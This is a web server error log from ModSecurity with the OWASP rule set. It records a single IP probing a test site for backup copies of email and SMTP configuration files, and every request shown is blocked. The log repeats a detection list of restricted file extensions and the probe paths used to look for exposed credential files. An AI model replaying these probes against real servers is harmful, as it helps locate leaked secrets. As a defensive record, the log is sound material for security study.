[Fri Jan 16 03:21:13.374596 2026] [:error] [pid 1444034] [client 45.148.10.246:45566] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmeRfEYyDES-ZFL4isAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.old
[Fri Jan 16 03:21:13.685295 2026] [:error] [pid 1444226] [client 45.148.10.246:45588] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmWcpoCUgeFICb0bf6gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.old
[Fri Jan 16 03:21:13.685635 2026] [:error] [pid 1444226] [client 45.148.10.246:45588] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmWcpoCUgeFICb0bf6gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.old
[Fri Jan 16 03:21:13.685803 2026] [:error] [pid 1444226] [client 45.148.10.246:45588] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmWcpoCUgeFICb0bf6gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.old
[Fri Jan 16 03:21:13.888978 2026] [:error] [pid 1444032] [client 45.148.10.246:45594] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmekMvq8uPO2ZciWrRgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/email.php.old
[Fri Jan 16 03:21:13.889323 2026] [:error] [pid 1444032] [client 45.148.10.246:45594] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmekMvq8uPO2ZciWrRgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/email.php.old
[Fri Jan 16 03:21:13.889508 2026] [:error] [pid 1444032] [client 45.148.10.246:45594] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmekMvq8uPO2ZciWrRgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/email.php.old
[Fri Jan 16 03:21:16.906261 2026] [:error] [pid 1444033] [client 45.148.10.246:45724] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.swp"] [unique_id "aWmgnNLJkp65ULFQ2YYizQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.swp
[Fri Jan 16 03:21:16.906692 2026] [:error] [pid 1444033] [client 45.148.10.246:45724] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.swp"] [unique_id "aWmgnNLJkp65ULFQ2YYizQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.swp
[Fri Jan 16 03:21:16.906877 2026] [:error] [pid 1444033] [client 45.148.10.246:45724] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.swp"] [unique_id "aWmgnNLJkp65ULFQ2YYizQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.swp
[Fri Jan 16 03:21:17.261552 2026] [:error] [pid 1444032] [client 45.148.10.246:45748] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.swp"] [unique_id "aWmgnekMvq8uPO2ZciWrSQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.swp
[Fri Jan 16 03:21:17.261896 2026] [:error] [pid 1444032] [client 45.148.10.246:45748] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.swp"] [unique_id "aWmgnekMvq8uPO2ZciWrSQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.swp
[Fri Jan 16 03:21:17.262069 2026] [:error] [pid 1444032] [client 45.148.10.246:45748] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.swp"] [unique_id "aWmgnekMvq8uPO2ZciWrSQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.swp
[Fri Jan 16 03:21:18.143402 2026] [:error] [pid 1444033] [client 45.148.10.246:45776] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.bak"] [unique_id "aWmgntLJkp65ULFQ2YYizgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.bak
[Fri Jan 16 03:21:18.143729 2026] [:error] [pid 1444033] [client 45.148.10.246:45776] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.bak"] [unique_id "aWmgntLJkp65ULFQ2YYizgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.bak
[Fri Jan 16 03:21:18.143898 2026] [:error] [pid 1444033] [client 45.148.10.246:45776] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.bak"] [unique_id "aWmgntLJkp65ULFQ2YYizgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.bak
[Fri Jan 16 03:21:19.060388 2026] [:error] [pid 1444034] [client 45.148.10.246:45804] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn-RfEYyDES-ZFL4itAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/smtp.php.old
[Fri Jan 16 03:21:19.060737 2026] [:error] [pid 1444034] [client 45.148.10.246:45804] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn-RfEYyDES-ZFL4itAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/smtp.php.old
[Fri Jan 16 03:21:19.060899 2026] [:error] [pid 1444034] [client 45.148.10.246:45804] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn-RfEYyDES-ZFL4itAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/smtp.php.old
[Fri Jan 16 03:21:19.324562 2026] [:error] [pid 1444226] [client 45.148.10.246:52580] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn2cpoCUgeFICb0bf7gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/smtp.php.old
[Fri Jan 16 03:21:19.324886 2026] [:error] [pid 1444226] [client 45.148.10.246:52580] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn2cpoCUgeFICb0bf7gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/smtp.php.old
[Fri Jan 16 03:21:19.325058 2026] [:error] [pid 1444226] [client 45.148.10.246:52580] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn2cpoCUgeFICb0bf7gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/smtp.php.old
[Fri Jan 16 03:21:19.542814 2026] [:error] [pid 1444032] [client 45.148.10.246:52586] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn-kMvq8uPO2ZciWrSwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.old
[Fri Jan 16 03:21:19.543146 2026] [:error] [pid 1444032] [client 45.148.10.246:52586] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn-kMvq8uPO2ZciWrSwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.old
[Fri Jan 16 03:21:19.543309 2026] [:error] [pid 1444032] [client 45.148.10.246:52586] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.old"] [unique_id "aWmgn-kMvq8uPO2ZciWrSwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.old
[Fri Jan 16 03:21:22.469100 2026] [:error] [pid 1444226] [client 45.148.10.246:52726] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgomcpoCUgeFICb0bf8QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/config/smtp.php.swp
[Fri Jan 16 03:21:22.469436 2026] [:error] [pid 1444226] [client 45.148.10.246:52726] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgomcpoCUgeFICb0bf8QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/config/smtp.php.swp
[Fri Jan 16 03:21:22.469599 2026] [:error] [pid 1444226] [client 45.148.10.246:52726] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgomcpoCUgeFICb0bf8QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/config/smtp.php.swp
[Fri Jan 16 03:21:22.781489 2026] [:error] [pid 1444040] [client 45.148.10.246:52750] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgovn_5sIyKhJ5GAza3wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//config/smtp.php.swp
[Fri Jan 16 03:21:22.781830 2026] [:error] [pid 1444040] [client 45.148.10.246:52750] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgovn_5sIyKhJ5GAza3wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//config/smtp.php.swp
[Fri Jan 16 03:21:22.782012 2026] [:error] [pid 1444040] [client 45.148.10.246:52750] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgovn_5sIyKhJ5GAza3wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//config/smtp.php.swp
